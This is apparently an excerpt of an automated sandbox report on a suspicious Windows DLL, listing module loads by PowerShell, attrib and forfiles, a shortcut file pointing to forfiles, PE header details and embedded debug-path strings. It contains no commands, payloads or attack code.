Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.9.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 5UIy3bo46y.dllStatic PE information: Image base 0x180000000 > 0x60000000
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 5UIy3bo46y.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: 5UIy3bo46y.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ws\System.Management.Automation.pdbpdbj source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb089899H5 source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000014.00000002.2364833973.000002152C5D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB321000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb{Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb_7 source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbr source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb, source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000014.00000002.2372611530.000002152C629000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2184620731.000001851BA80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8AB6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774067227.000002476F732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automationb.pdb&^ source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbg source: powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417120815.000001B76A18A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2197283163.00000148CB296000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbX source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000014.00000002.2364833973.000002152C5FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb;Q source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbl source: powershell.exe, 00000014.00000002.2372816905.000002152C62E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89) source: powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: 5UIy3bo46y.dll
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbr source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1783891772.000002476FA08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364833973.000002152C580000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2195588775.00000148CB080000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb9 source: powershell.exe, 00000008.00000002.2164598925.000001851B744000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdbi source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb? source: powershell.exe, 00000007.00000002.1761764309.00000193E8B9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000007.00000002.1750975214.00000193E88BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2164598925.000001851B6B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2371138397.000002152C609000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000008.00000002.2184620731.000001851BB12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2183326831.00000148CAFD7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2417698234.000001B76A216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000007.00000002.1752473961.00000193E8B63000.00000004.00000020.00020000.00000000.sdmp
